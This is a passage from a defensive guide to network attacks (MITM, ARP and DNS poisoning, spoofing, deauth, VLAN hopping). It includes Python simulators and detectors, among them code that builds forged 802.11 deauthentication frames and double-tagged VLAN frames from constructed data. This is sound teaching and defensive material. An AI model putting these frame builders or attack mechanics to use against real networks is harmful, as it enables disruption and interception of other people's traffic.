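The mitigation difference above can be made concrete: a per-source rate limit, the "simpler countermeasure", stops a single flooding host, but a botnet in which every bot stays under that limit still exceeds the server's capacity. The following is an added example, not part of the original guide; the request log is constructed (one second of traffic) and the thresholds are assumptions that a real deployment would tune to the service.

```python
"""Per-source versus aggregate request-rate detection for one second of traffic.

Added example, not from the original guide. The traffic mix and the
per-source limit / capacity figures are assumptions for illustration.
"""
from collections import Counter


def build_second(with_dos=True, with_ddos=True):
    """Constructed list of source IPs, one entry per request received in one second."""
    reqs = []
    for i in range(20):                          # 20 ordinary clients, 2 requests each
        reqs += [f"192.0.2.{i + 1}"] * 2
    if with_dos:                                 # one host hammering the service
        reqs += ["198.51.100.7"] * 500
    if with_ddos:                                # 400 bots, 3 requests each: individually normal
        for b in range(400):
            reqs += [f"10.{b // 256}.{b % 256}.1"] * 3
    return reqs


def analyze_second(reqs, per_source_limit=50, capacity=1000):
    """Classify one second of requests.
    rate_limited: sources above per_source_limit (the single-attacker DoS signature)
    overloaded:   total requests exceed what the service can handle
    distributed:  still overloaded after dropping the rate-limited sources, i.e. the
                  load comes from many sources that each look normal (DDoS)."""
    counts = Counter(reqs)
    limited = sorted(ip for ip, n in counts.items() if n > per_source_limit)
    total = sum(counts.values())
    remaining = total - sum(counts[ip] for ip in limited)
    return {
        "total": total,
        "sources": len(counts),
        "rate_limited": limited,
        "overloaded": total > capacity,
        "distributed": remaining > capacity,
    }


if __name__ == "__main__":
    print(analyze_second(build_second()))
    print(analyze_second(build_second(with_ddos=False)))
```

With both attacks present the single flooder is caught and dropped, yet 1,240 requests from 420 well-behaved-looking sources remain against a capacity of 1,000; that residue is what pushes mitigation upstream (scrubbing services, anycast, or provider-side filtering) rather than onto the server itself.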

MITM
A Man-In-The-Middle (MITM) attack occurs when a malicious actor intercepts
the communication between two parties without their consent, with the
objective of eavesdropping or manipulating the exchanged data. By this
method, attackers may steal sensitive information, tamper with the
transmitted data, or impersonate the involved parties to gain unauthorized
control or access.

Types of MITM Attacks

Some common types of MITM attacks include:

• IP Spoofing: The attacker forges the source IP address of packets to
impersonate a trusted device and insert themselves into a connection
with the victim.

• DNS Spoofing: The attacker supplies forged DNS answers so that the
victim is directed to an attacker-controlled server instead of the
intended one.

• ARP Spoofing: The attacker sends forged ARP replies so that the
victim’s ARP cache associates the attacker’s MAC (Media Access Control)
address with another host’s IP address (typically the gateway),
redirecting the victim’s traffic through the attacker’s device.

• SSL/TLS Interception: The attacker terminates the victim’s TLS
connection on their own device and opens a second connection to the real
server. This only succeeds if the victim accepts the attacker’s
certificate (for example, after a rogue CA has been installed on the
device, or if the client fails to validate certificates), or if the
attacker can downgrade the connection to plain HTTP.

Prevention and Mitigation Strategies

To reduce the risk of MITM attacks, developers, administrators, and users
should follow these best practices:

• Use HTTPS and encryption: Encrypt all sensitive traffic using TLS
(HTTPS for web traffic); SSL and early TLS versions are deprecated and
should be disabled.

• Validate certificates: Clients must verify that the server’s
certificate chains to a trusted Certificate Authority (CA) and matches
the hostname; a client that skips this check is trivially interceptable.

• Implement HSTS: Deploy HTTP Strict Transport Security (HSTS), a
response header that instructs browsers to use HTTPS only for the
domain, so that an attacker cannot downgrade the connection to HTTP.

• Secure DNS: Use DNS Security Extensions (DNSSEC) to ensure the
integrity and authenticity of DNS records.

• Enable network segregation: Segment networks and restrict access
between them, so that an attacker who gains a foothold on one segment
cannot position themselves on the path to sensitive systems.

• Regularly update software and firmware: Keep all systems,
applications, and devices up-to-date to minimize known vulnerabilities.

• Educate users: Provide awareness training so that users recognize
certificate warnings and untrusted networks as signs of a possible MITM
attack rather than clicking through them.


By understanding MITM attacks and implementing the appropriate
preventive measures, you can significantly reduce the risk of falling victim to
these types of cyber threats.

ARP Poisoning
ARP Poisoning, also known as ARP spoofing or ARP cache poisoning, is a
cyber attack technique that exploits the Address Resolution Protocol (ARP) in
a computer network. ARP is responsible for mapping an IP address to a
corresponding Media Access Control (MAC) address, so that data packets can
be correctly transmitted to the intended network device. An attacker can use
ARP poisoning to intercept, modify, or disrupt communications between
network devices.

How It Works:

• The attacker sends falsified ARP messages to the network, associating
their MAC address with the IP address of a targeted device (such as a
server or gateway).

• Other devices on the network treat the attacker’s MAC address as the
legitimate one for the targeted IP address, updating their ARP tables
accordingly.

• As a result, data packets that were meant for the targeted device are
now sent to the attacker instead, potentially enabling them to
eavesdrop, modify, or disrupt network traffic.

Consequences:

ARP poisoning can lead to serious security issues, including:

• Data leakage: Attackers can intercept sensitive data exchanged
between devices on the network.

• Man-in-the-middle attacks: Attackers can modify data in transit,
potentially inserting malicious content.

• Denial of Service (DoS) attacks: Attackers can render a targeted
device unresponsive by flooding it with traffic or by dropping all
packets bound for it.

Prevention and Mitigation:

Several strategies can help protect networks against ARP poisoning:

• Static ARP entries: Pin the IP-to-MAC mappings of critical hosts
(such as the default gateway) so that forged ARP replies cannot change
them. This does not scale to large networks, so reserve it for a few
key devices.

• ARP inspection: Use switches that support Dynamic ARP Inspection
(DAI), which validates ARP packets against the DHCP snooping binding
table (or static bindings) and drops those that do not match, or
firewalls and Intrusion Detection/Prevention Systems (IDS/IPS) with
similar features.

• IPsec or TLS: Encrypt and authenticate traffic between hosts with
IPsec or TLS, so that an attacker who does redirect the traffic cannot
read or tamper with it.

• Regular monitoring: Continuously monitor network traffic and device
ARP tables for anomalies, such as an IP address that changes MAC
address or one MAC address that answers for several IP addresses,
using a Network Intrusion Detection System (NIDS) or a dedicated ARP
monitor.
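The "regular monitoring" item above, and the ARP Spoofing entry in the MITM section, come down to two signatures in the stream of ARP replies: an IP address that suddenly maps to a different MAC, and one MAC that claims several IP addresses (the attacker must answer for both the gateway and the victim to relay traffic in both directions). The watcher below is an added example, not from the original guide; the replies are constructed rather than captured, the addresses are example values, and the `trusted` table stands in for static entries or the DHCP snooping bindings that DAI consults.

```python
"""Watch ARP replies for the two signatures of cache poisoning.

Added example, not from the original guide. The replies are constructed
(no capture), the addresses are example values, and `trusted` stands in
for static entries or DHCP snooping bindings.
"""
from collections import defaultdict

# Constructed ARP replies: (time_s, sender_ip, sender_mac)
SAMPLE_ARP = [
    (0.0, "192.0.2.1", "00:11:22:33:44:01"),    # gateway announces itself
    (1.0, "192.0.2.10", "00:11:22:33:44:10"),
    (2.0, "192.0.2.11", "00:11:22:33:44:11"),
    (30.0, "192.0.2.1", "00:11:22:33:44:ee"),   # attacker claims the gateway's IP...
    (31.0, "192.0.2.10", "00:11:22:33:44:ee"),  # ...and the victim's, to relay both ways
]


def watch_arp(replies, trusted=None):
    """Return a list of alert strings for the reply stream.
    trusted: optional {ip: mac} pins that are never overwritten (static entries)."""
    pinned = {ip: m.lower() for ip, m in (trusted or {}).items()}
    learned = dict(pinned)                 # ip -> mac, as a host's ARP cache would hold it
    ips_by_mac = defaultdict(set)
    alerts = []
    for t, ip, mac in replies:
        mac = mac.lower()
        known = learned.get(ip)
        if known is not None and known != mac:
            # Signature 1: an IP we already know moves to a different MAC.
            note = " (pinned entry; reply ignored)" if ip in pinned else ""
            alerts.append(f"t={t}: {ip} changed from {known} to {mac}{note}")
        if ip not in pinned:
            learned[ip] = mac              # an unpinned cache follows the latest reply
        ips_by_mac[mac].add(ip)
        if len(ips_by_mac[mac]) > 1:
            # Signature 2: one MAC now answers for several IPs.
            alerts.append(f"t={t}: {mac} now claims {sorted(ips_by_mac[mac])}")
    return alerts


if __name__ == "__main__":
    for a in watch_arp(SAMPLE_ARP, trusted={"192.0.2.1": "00:11:22:33:44:01"}):
        print(a)
```

Signature 2 also fires for legitimate multi-homed devices (a router answering for several of its own addresses), so in practice the set of MACs allowed to claim more than one IP is whitelisted; signature 1 against a pinned gateway entry is the one worth paging on.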

Evil Twin
An Evil Twin Attack is a malicious tactic used by cybercriminals to deceive
users by creating a fake wireless Access Point (AP) that mimics the
characteristics of a legitimate one. This rogue access point usually has the
same network name (SSID) and security settings as a genuine AP, making it
difficult for users to differentiate between the two.

How it works

• The attacker sets up their own hardware in the vicinity of the targeted
wireless network and configures a rogue AP with the same SSID and
security settings as the genuine network.

• Unsuspecting users connect to the rogue AP, thinking it’s the legitimate
network.

• The attacker can now intercept and, in some cases, alter the user’s
data transmitted over the network. This can include sensitive
information such as login credentials, credit card details, and personal
conversations.

Risks associated with Evil Twin Attacks

• Unauthorized access to sensitive information: The attacker can gain
access to your usernames, passwords, and other confidential
information.

• Loss of privacy: The attacker can eavesdrop on personal or business
conversations, which can lead to blackmail or identity theft.

• Data manipulation: The attacker can alter transmitted data, leading to
misinformation or unintended actions.

Preventing Evil Twin Attacks

• Use a VPN: A Virtual Private Network (VPN) encrypts the traffic
between your device and the VPN endpoint, so that a rogue AP sees only
encrypted data. Note that traffic sent before the tunnel is up, and DNS
queries if they are not routed through the tunnel, remain exposed.

• Verify the network, not just the SSID: An SSID can be copied exactly,
so it is not proof of identity. Be cautious of networks that do not
require a password, or that suddenly stop requiring one. For corporate
networks, WPA2/WPA3-Enterprise (802.1X) with the client configured to
validate the RADIUS server’s certificate lets the device reject an
impostor AP automatically.

• Enable two-factor authentication: Enable two-factor authentication
(2FA) for critical accounts and services, so that a captured password
alone does not give the attacker access.

• Keep software up-to-date: Regularly update your devices, software,
and operating system to protect against known vulnerabilities and
security threats.

• Educate yourself and others: Be aware of the risks associated with
Evil Twin Attacks, and inform others to increase overall security
awareness.

DNS Poisoning
DNS Poisoning, also known as DNS Cache Poisoning or DNS Spoofing,
is a type of cyberattack where cyber-criminals manipulate the Domain Name
System (DNS) responses to redirect users to malicious websites. Let’s dive
deeper to understand how it works and its potential impact.

How DNS Poisoning Works

The DNS is like the internet’s phonebook; it translates human-readable
domain names (e.g., www.example.com) into their corresponding IP
addresses for computers to understand. This process involves a DNS
resolver, which answers from its cache when it can and otherwise queries
authoritative servers on the user’s behalf. In a DNS poisoning attack, an
attacker gets a forged answer accepted by the resolver, so that the false
record is cached and served to every subsequent client that asks.

Here’s a quick outline of the process:

• A user requests the IP address for a legitimate website (e.g.,
www.example.com).

• The resolver, which has no cached answer, sends a query to the
authoritative DNS server. The query carries a 16-bit transaction ID and
is sent from a UDP source port; a reply is accepted only if both match.

• The attacker races the legitimate reply with forged responses that
guess the transaction ID (and the source port, if it is predictable). If
a guess matches before the real answer arrives, the resolver caches the
forged record.

• The resolver then returns the falsified IP address to the user, and to
every other client that asks while the record remains cached.

• The user unknowingly accesses the attacker-controlled malicious
website instead of the intended legitimate site.
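The race in the steps above is a guessing game whose odds depend on how much the resolver randomizes. The toy resolver below is an added example, not part of the original guide: it accepts the first reply that matches the outstanding query's transaction ID and port, and an attacker floods it with forged replies before the legitimate one arrives. Run once with a fixed source port and once with a random one; addresses, counts and the seed are constructed assumptions, and the model ignores timing and the need to trigger fresh queries.

```python
"""Toy resolver: why transaction-ID guessing works and source-port randomization helps.

Added example, not from the original guide. Resolver, attacker loop,
addresses and counts are constructed for illustration.
"""
import random

LEGIT_IP, FORGED_IP = "192.0.2.80", "203.0.113.66"
NAME = "www.example.com"


class ToyResolver:
    """Caches the first reply whose (TXID, port) matches the outstanding query."""

    def __init__(self, rng, randomize_port):
        self.rng, self.randomize_port = rng, randomize_port
        self.cache, self.pending = {}, {}

    def send_query(self, name):
        txid = self.rng.getrandbits(16)                 # 16-bit transaction ID
        port = self.rng.randint(1024, 65535) if self.randomize_port else 53
        self.pending[name] = (txid, port)
        return txid, port

    def receive(self, name, txid, port, ip):
        if self.pending.get(name) != (txid, port):
            return False                                # mismatch: silently dropped
        self.cache[name] = ip                           # first match wins and is cached
        del self.pending[name]
        return True


def simulate(randomize_port, forged_per_query=5000, trials=200, seed=7):
    """Fraction of trials in which the attacker's forged answer ends up cached."""
    rng = random.Random(seed)
    poisoned = 0
    for _ in range(trials):
        r = ToyResolver(rng, randomize_port)
        txid, port = r.send_query(NAME)
        # Attacker floods forged replies, guessing TXID (and port) before the real reply.
        for _ in range(forged_per_query):
            g_txid = rng.getrandbits(16)
            g_port = rng.randint(1024, 65535) if randomize_port else 53
            if r.receive(NAME, g_txid, g_port, FORGED_IP):
                break
        r.receive(NAME, txid, port, LEGIT_IP)            # real reply: too late if poisoned
        poisoned += r.cache[NAME] == FORGED_IP
    return poisoned / trials


if __name__ == "__main__":
    print("fixed port  :", simulate(randomize_port=False))
    print("random port :", simulate(randomize_port=True))
```

With only the 16-bit transaction ID to guess, 5,000 forged replies hit roughly 7% of the time per query; adding a random source port multiplies the search space by about 64,000 and the hit rate collapses. DNSSEC validation removes the guessing game entirely, since a forged record without a valid signature is rejected however well it matches.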

Impacts of DNS Poisoning

DNS poisoning has several potential impacts on both users and
organizations:

• Phishing and Identity Theft: By redirecting users to malicious
websites, attackers can steal sensitive information, such as login
credentials or personal details, to be used for identity theft or other
fraudulent activities.

• Malware Distribution: Malicious websites may expose users to
malware, ransomware, or other cyber threats.

• Loss of Trust: If an organization’s domain is targeted in a DNS
poisoning attack, its customers may lose trust and doubt the security
of the organization’s online services.

Preventing and Mitigating DNS Poisoning

Here are some steps you can take to prevent and mitigate the risk of DNS
poisoning:

• Use DNSSEC: DNSSEC (Domain Name System Security Extensions) adds
digital signatures to DNS records, so a validating resolver can detect
and discard forged answers. Signing your own zones protects your
users only if their resolvers validate.

• Keep Software Updated: Regularly update your DNS software,
operating systems, and other network tools to ensure they’re
protected against known vulnerabilities.

• Use Secure DNS Resolvers: Choose a resolver that validates DNSSEC
signatures, randomizes both transaction IDs and UDP source ports (which
makes a forged reply far harder to guess), and supports encrypted
transport such as DNS over TLS or DNS over HTTPS.

• Monitor Your DNS Traffic: Regularly monitoring DNS query logs can
help you identify suspicious patterns, such as bursts of replies with
mismatched transaction IDs, which may indicate DNS poisoning attempts.

In summary, DNS poisoning is a potent cyber threat that manipulates DNS
data to redirect users to malicious websites. By implementing security
measures such as DNSSEC, keeping software updated, and closely
monitoring DNS traffic, you can significantly reduce the risk of falling victim
to DNS poisoning attacks.

Spoofing
Spoofing is a type of cyber attack where an attacker impersonates or
masquerades as another entity (person or system) to gain unauthorized
access to sensitive information, manipulate communications or bypass
network security measures. Spoofing can come in various forms, including:

IP Spoofing

IP Spoofing refers to when an attacker sends packets with a forged
source IP address. This is often done to bypass IP-based access controls,
to hide the true origin of an attack, or to direct reply traffic at a
third party (as in reflected denial of service attacks). Potential
consequences of a successful IP spoofing attack include unauthorized
access to systems, data manipulation, and denial of service attacks.

To protect against IP spoofing, organizations can implement ingress and
egress filtering (BCP 38), which drops packets whose source address could
not legitimately arrive on that interface, and adopt protocols that
authenticate the sender rather than trusting the source address.


Email Spoofing

Email spoofing involves forging the header information of an email to make
it appear as if it’s sent from a legitimate source. Attackers often use this
tactic in phishing attacks, where emails are made to look like they are from
trusted sources, prompting recipients to click on malicious links or share
sensitive information.

To defend against email spoofing, it is essential to publish and enforce
the email authentication protocols Sender Policy Framework (SPF),
DomainKeys Identified Mail (DKIM), and Domain-based Message
Authentication, Reporting, and Conformance (DMARC). SPF lists the hosts
allowed to send for a domain, DKIM signs messages, and DMARC ties both to
the visible From: address and tells receivers what to do when the checks
fail.
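How the three protocols fit together is easiest to see by evaluating a message the way a receiving mail server does. The code below is an added example, not from the original guide: it replaces DNS lookups with an in-memory table of constructed records, handles only the ip4/ip6/all SPF mechanisms (include:, a and mx would need real DNS), and does not model DKIM, so DMARC here passes only on SPF that is aligned with the From: domain. The domains, addresses and records are example values.

```python
"""Evaluate SPF and DMARC alignment for a message, offline.

Added example, not from the original guide. DNS is replaced by constructed
records; only ip4/ip6/all mechanisms are handled and DKIM is not modelled.
"""
import ipaddress

SPF_RECORDS = {                                         # constructed DNS table
    "example.com": "v=spf1 ip4:192.0.2.0/24 -all",
    "bulk.example.net": "v=spf1 ip4:198.51.100.0/24 -all",
}
DMARC_RECORDS = {
    "example.com": "v=DMARC1; p=reject; aspf=s; rua=mailto:dmarc@example.com",
}
RESULTS = {"+": "pass", "-": "fail", "~": "softfail", "?": "neutral"}


def check_spf(record, sender_ip):
    """Return 'pass', 'fail', 'softfail' or 'neutral' for sender_ip under `record`."""
    ip = ipaddress.ip_address(sender_ip)
    terms = record.split()
    if not terms or terms[0].lower() != "v=spf1":
        raise ValueError("not an SPF record")
    for term in terms[1:]:
        qualifier = "+"
        if term[0] in RESULTS:
            qualifier, term = term[0], term[1:]
        mech = term.lower()
        if mech == "all":
            return RESULTS[qualifier]
        if mech.startswith(("ip4:", "ip6:")):
            if ip in ipaddress.ip_network(term[4:], strict=False):
                return RESULTS[qualifier]
        # include:, a, mx, exists: need DNS; skipped in this offline example
    return "neutral"


def parse_dmarc(record):
    pairs = (part.partition("=") for part in record.split(";"))
    return {k.strip(): v.strip() for k, _, v in pairs if k.strip()}


def org_domain(domain):
    """Organizational domain. Real receivers use the Public Suffix List; the
    two-label rule here is a simplification for the example."""
    return ".".join(domain.lower().split(".")[-2:])


def evaluate(mail_from_domain, header_from_domain, sender_ip):
    """Receiver-side decision: SPF on the envelope sender, alignment with the
    visible From: domain, then the DMARC policy of that domain."""
    spf = check_spf(SPF_RECORDS.get(mail_from_domain, "v=spf1 ?all"), sender_ip)
    dmarc = parse_dmarc(DMARC_RECORDS.get(org_domain(header_from_domain),
                                          "v=DMARC1; p=none"))
    strict = dmarc.get("aspf", "r") == "s"
    if strict:
        aligned = mail_from_domain.lower() == header_from_domain.lower()
    else:
        aligned = org_domain(mail_from_domain) == org_domain(header_from_domain)
    dmarc_pass = spf == "pass" and aligned
    return {"spf": spf, "aligned": aligned,
            "dmarc": "pass" if dmarc_pass else "fail",
            "disposition": "accept" if dmarc_pass else dmarc.get("p", "none")}


if __name__ == "__main__":
    print(evaluate("example.com", "example.com", "192.0.2.10"))      # legitimate
    print(evaluate("example.com", "example.com", "203.0.113.5"))     # forged envelope
    print(evaluate("bulk.example.net", "example.com", "198.51.100.9"))  # SPF ok, not aligned
```

The third case is the one SPF alone misses: the attacker sends from a domain they control, so SPF passes, but the From: header the recipient sees says example.com. Only DMARC's alignment requirement, backed by p=reject, turns that into a rejection.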

Caller ID Spoofing

In caller ID spoofing, an attacker changes the caller ID information to
deceive the recipient. This technique is commonly used in phone scams,
where the attacker disguises their identity to create a sense of trust and
convince the recipient to share personal information or carry out actions
on the attacker’s behalf.

To reduce the risk of caller ID spoofing, be cautious of unexpected calls from
unknown numbers, never share sensitive information over the phone, and
implement call-blocking services.

Address Resolution Protocol (ARP) Spoofing

ARP Spoofing, also known as ARP poisoning, involves an attacker forging
ARP messages to associate their MAC address with the IP address of a
legitimate network device. This allows the attacker to intercept and modify
network traffic, potentially leading to man-in-the-middle attacks or denial of
service.

To defend against ARP spoofing, organizations can employ dynamic ARP
inspection, static ARP entries, and intrusion detection systems that monitor
for unusual ARP activity.

In summary, spoofing attacks can impact various aspects of digital
communication, whether it be IP-based, email, phone, or network traffic. To
protect against spoofing, be vigilant and employ defensive measures, such
as network authentication protocols, monitoring suspicious activities, and
educating users about potential risks.


Deauth Attack
A Deauthentication (Deauth) Attack is a type of Denial-of-Service (DoS)
attack that specifically targets wireless networks. It works by exploiting
how Wi-Fi devices manage their connections, intentionally causing
legitimate users to be disconnected from the access point. The attacker
sends forged deauthentication (Deauth) frames that appear to come from
the access point (or from the client), so the receiving side tears down the
association; repeating the frames keeps the client from staying connected.

How Does a Deauth Attack Work?

Deauth attacks take advantage of the management frames defined in the
802.11 Wi-Fi standard. Management frames coordinate the relationship
between a client and an access point and include the authentication,
association, disassociation, and deauthentication subtypes. Unless
Protected Management Frames (802.11w) are in use, these frames are
neither encrypted nor authenticated, so anyone within radio range can
forge a deauthentication frame carrying the access point’s address as the
sender.

When a Deauth frame is received by a user’s device, it drops its
connection to the access point, and the user must re-connect in order to
reestablish data transfer with the Wi-Fi network.

Impacts and Consequences

Deauth attacks can cause the following problems:

• Loss of connectivity: The most obvious consequence is that network
connectivity is lost, disrupting any network-related activity and
potentially causing loss of unsaved data.

• Network congestion: As deauthenticated devices try to reconnect,
this increased activity can cause network congestion, leading to further
performance degradation.

• Credentials theft: Deauth attacks can be used in conjunction with
fake access points, allowing attackers to trick users into connecting to
these malicious networks and subsequently stealing their credentials
and sensitive data. Forcing a reconnection is also how attackers capture
the WPA2 four-way handshake for offline password cracking.

How to Prevent Deauth Attacks

There isn’t a foolproof solution to protect against deauth attacks,
because the attacker only needs to transmit on the same channel, and
older clients do not authenticate management frames. However, you can
take the following steps to reduce your risk:

• Enable 802.11w (Protected Management Frames): Access points that
support 802.11w add a message integrity code to deauthentication and
disassociation frames, so a client can discard forged ones. Both the
access point and the client must support it, and it should be set to
“required” rather than “optional” wherever the client population allows.

• Use WPA3: WPA3 makes Protected Management Frames mandatory, so
moving a network to WPA3 brings deauth protection with it. Strong
authentication such as EAP-TLS protects credentials but does not by
itself stop forged management frames.

• Monitor your network for suspicious activity: Use a wireless
intrusion detection system or Wi-Fi analyzer to detect bursts of
deauthentication frames, which are a clear sign of an attack in progress.

• Secure your access points: Regularly update your router’s firmware
and configure its settings to disable remote management access,
applying strong access credentials to minimize unauthorized access.

As an author of this guide, I advise you to stay diligent and follow the best
practices in order to safeguard your network from deauth attacks and other
security threats.
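A deauthentication frame is small enough to build and parse by hand, which is also how a monitoring tool recognizes an attack: the "burst of deauth frames" mentioned above looks very different from an access point occasionally removing an idle client. The code below is an added example, not from the original guide; the frames are constructed rather than captured (a monitor-mode capture would supply the same bytes), and the MAC addresses, timings and burst threshold are assumptions.

```python
"""Build and parse 802.11 deauthentication frames, and flag deauth bursts.

Added example, not from the original guide. Frames are constructed rather
than captured; addresses, timings and the burst threshold are assumptions.
"""
import struct
from collections import defaultdict, deque

MGMT_DEAUTH, MGMT_DISASSOC = 0xC, 0xA        # management-frame subtypes
BROADCAST = "ff:ff:ff:ff:ff:ff"
HDR = "<HH6s6s6sH"                           # Frame Control, Duration, addr1-3, Seq Ctrl


def mac(text):
    return bytes.fromhex(text.replace(":", ""))


def mac_str(raw):
    return ":".join(f"{b:02x}" for b in raw)


def build_mgmt(subtype, dst, src, bssid, reason=7, seq=0):
    """Management frame: type 0, given subtype, 2-byte reason code as the body."""
    frame_control = (0 << 2) | (subtype << 4)           # version 0, type 0 (management)
    header = struct.pack(HDR, frame_control, 0x013A, mac(dst), mac(src), mac(bssid), seq << 4)
    return header + struct.pack("<H", reason)


def parse_mgmt(frame):
    fc, _, a1, a2, a3, _ = struct.unpack_from(HDR, frame, 0)
    ftype, subtype = (fc >> 2) & 0x3, (fc >> 4) & 0xF
    reason = None
    if ftype == 0 and subtype in (MGMT_DEAUTH, MGMT_DISASSOC):
        reason = struct.unpack_from("<H", frame, struct.calcsize(HDR))[0]
    return {"type": ftype, "subtype": subtype, "dst": mac_str(a1),
            "src": mac_str(a2), "bssid": mac_str(a3), "reason": reason}


def detect_deauth_bursts(frames, window_s=10.0, threshold=20):
    """frames: iterable of (timestamp_s, raw_frame). One alert per BSSID per burst:
    more than `threshold` deauth/disassoc frames inside a sliding window."""
    recent, alerts, alerted = defaultdict(deque), [], set()
    for ts, raw in frames:
        p = parse_mgmt(raw)
        if p["type"] != 0 or p["subtype"] not in (MGMT_DEAUTH, MGMT_DISASSOC):
            continue
        q = recent[p["bssid"]]
        q.append(ts)
        while q and ts - q[0] > window_s:
            q.popleft()
        if len(q) >= threshold and p["bssid"] not in alerted:
            alerted.add(p["bssid"])
            alerts.append({"bssid": p["bssid"], "count": len(q), "at": ts,
                           "broadcast": p["dst"] == BROADCAST, "reason": p["reason"]})
    return alerts


AP = "aa:bb:cc:00:00:01"


def sample_capture():
    """Constructed capture: three routine deauths over a minute (reason 4, inactivity),
    then 50 broadcast deauths spoofing the AP in two seconds (reason 7)."""
    frames = []
    for i, t in enumerate((5.0, 30.0, 55.0)):
        frames.append((t, build_mgmt(MGMT_DEAUTH, f"02:00:00:00:00:{i + 1:02x}", AP, AP, reason=4)))
    for i in range(50):
        frames.append((60.0 + i * 0.04, build_mgmt(MGMT_DEAUTH, BROADCAST, AP, AP, reason=7, seq=i)))
    return frames


if __name__ == "__main__":
    print(detect_deauth_bursts(sample_capture()))
```

The two tells in the alert are the broadcast destination (a real AP deauthenticates one client at a time) and the rate; with 802.11w enabled, a client would additionally discard these frames because they carry no valid integrity code, which is why the standard is the real fix and the detector only tells you it is happening.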

VLAN Hopping
VLAN hopping is a network-based attack that exploits weaknesses in how
switches negotiate trunk links and handle 802.1Q tags in a local area
network (LAN). The objective of this attack is to send traffic into, or
receive traffic from, a VLAN the attacker’s port is not assigned to,
bypassing the segmentation the VLANs were meant to provide.

How VLAN Hopping Works

There are two primary methods of VLAN hopping:

• Switch Spoofing: The attacker’s device pretends to be a switch and
negotiates a trunk link with the real switch, typically by sending
Dynamic Trunking Protocol (DTP) messages to a port left in its default
“auto” or “desirable” mode. Since trunk links carry traffic from
multiple VLANs, the attacker can then send and receive traffic on every
VLAN allowed on that trunk.

• Double Tagging: The attacker sends frames carrying two 802.1Q VLAN
tags. The outer tag matches the native VLAN of the trunk, so the first
switch strips it and forwards the frame untagged over the trunk; the
second switch then reads the inner tag and delivers the frame into that
VLAN. This only works when the attacker’s access port is in the native
VLAN, and it is one-way: the attacker can inject frames but receives no
replies.

Preventing VLAN Hopping

To secure your network from VLAN hopping attacks, consider implementing
the following best practices:

• Disable trunk negotiation and unused ports: Shut down any unused
switch ports, configure user-facing ports explicitly as access ports,
and turn off DTP on them (for example, “switchport nonegotiate” on Cisco
IOS) so that a connected device cannot negotiate a trunk.

• Configure Allowed VLANs on Trunk Links: Restrict the VLANs that
can be carried on trunk links by explicitly specifying the allowed
VLANs. This limits what an attacker who does obtain a trunk can reach.

• Implement VLAN Access Control Lists (VACLs): VACLs can be
used to filter traffic at the VLAN level, preventing unauthorized traffic
from entering or leaving a VLAN.

• Use an unused native VLAN and tag it: Set the native VLAN of each
trunk to a dedicated, unused VLAN ID that no access port belongs to, and
enable native VLAN tagging (802.1Q tagging of the native VLAN) so the
outer tag is never stripped. Either measure alone defeats double
tagging; together they also cover misconfigured ports.
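The double-tagging mechanics, and why the last prevention item works, can be traced through a small model of the two switches. The code below is an added example, not from the original guide: it builds an Ethernet frame with two 802.1Q tags, passes it through a simplified access port, trunk egress and trunk ingress, and reports which VLAN the frame lands in under each configuration. The switch model and the VLAN numbers are assumptions for illustration; real switches differ in details such as how access ports treat tagged frames.

```python
"""Double-tagged 802.1Q frames and how native-VLAN handling decides where they land.

Added example, not from the original guide. The frame builder, the simplified
switch model and the VLAN numbers are assumptions for illustration.
"""
import struct

ETHERTYPE_8021Q, ETHERTYPE_IPV4 = 0x8100, 0x0800


def mac(text):
    return bytes.fromhex(text.replace(":", ""))


def build_frame(dst, src, vlan_ids, payload=b"", ethertype=ETHERTYPE_IPV4):
    """Ethernet frame with zero or more 802.1Q tags, outermost first (PCP/DEI zero)."""
    frame = mac(dst) + mac(src)
    for vid in vlan_ids:
        frame += struct.pack("!HH", ETHERTYPE_8021Q, vid & 0x0FFF)
    return frame + struct.pack("!H", ethertype) + payload


def parse_tags(frame):
    """Return (VLAN IDs outermost first, offset of the payload ethertype)."""
    tags, off = [], 12
    while struct.unpack_from("!H", frame, off)[0] == ETHERTYPE_8021Q:
        tags.append(struct.unpack_from("!H", frame, off + 2)[0] & 0x0FFF)
        off += 4
    return tags, off


def strip_outer_tag(frame):
    return frame[:12] + frame[16:]


def add_outer_tag(frame, vid):
    return frame[:12] + struct.pack("!HH", ETHERTYPE_8021Q, vid) + frame[12:]


def access_ingress(frame, port_vlan):
    """Access port: untagged frames, or frames tagged with the port's own VLAN, are
    classified into port_vlan; a frame tagged for any other VLAN is dropped."""
    tags, _ = parse_tags(frame)
    if tags and tags[0] != port_vlan:
        return None
    return port_vlan, frame


def trunk_egress(vlan, frame, native_vlan, tag_native):
    """Trunk port: native-VLAN frames leave untagged unless native tagging is on;
    every other frame carries its VLAN as the outer tag."""
    tags, _ = parse_tags(frame)
    if vlan == native_vlan and not tag_native:
        return strip_outer_tag(frame) if tags and tags[0] == vlan else frame
    if not tags or tags[0] != vlan:
        frame = add_outer_tag(frame, vlan)
    return frame


def trunk_ingress(frame, native_vlan):
    """Receiving switch: the outer tag selects the VLAN; untagged means native."""
    tags, _ = parse_tags(frame)
    return tags[0] if tags else native_vlan


def deliver(frame, attacker_port_vlan, native_vlan, tag_native=False):
    """VLAN in which the second switch delivers the frame, or None if dropped."""
    accepted = access_ingress(frame, attacker_port_vlan)
    if accepted is None:
        return None
    vlan, f = accepted
    return trunk_ingress(trunk_egress(vlan, f, native_vlan, tag_native), native_vlan)


# Attacker on an access port in VLAN 1 targets VLAN 20 with tags [1, 20].
ATTACK = build_frame("ff:ff:ff:ff:ff:ff", "02:00:00:00:00:01", [1, 20], b"payload")

if __name__ == "__main__":
    print("native=1, untagged native :", deliver(ATTACK, 1, 1))            # 20: hopped
    print("native=1, tagged native   :", deliver(ATTACK, 1, 1, True))      # 1: contained
    print("native=999 (unused)       :", deliver(ATTACK, 1, 999))          # 1: contained
```

In the first case the first switch strips the outer tag because VLAN 1 is the untagged native VLAN, and the second switch reads the inner tag 20. Tagging the native VLAN keeps the outer tag in place, and moving the native VLAN to an ID no access port uses means the attacker's frame is never in the native VLAN to begin with.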

Remember that implementing these security practices is crucial in protecting
your network from VLAN hopping and other types of network-based attacks.
Always stay vigilant and keep your network’s security protocols up-to-date to
minimize the chances of a successful cyber attack.

Rogue Access Point

A Rogue Access Point (RAP) is an unauthorized wireless access point that
is installed or connected to a network without the network administrator’s
consent. These access points can be set up by attackers to exploit security
vulnerabilities within the network or by employees for personal usage. RAPs
can lead to several network-based attacks, causing severe damage to an
organization’s security.

Risks Associated with Rogue Access Points

• Unauthorized Access: Attackers can use RAPs to gain unauthorized
access to a victim’s sensitive data.

• Man-in-the-Middle Attacks: Cybercriminals can intercept or alter
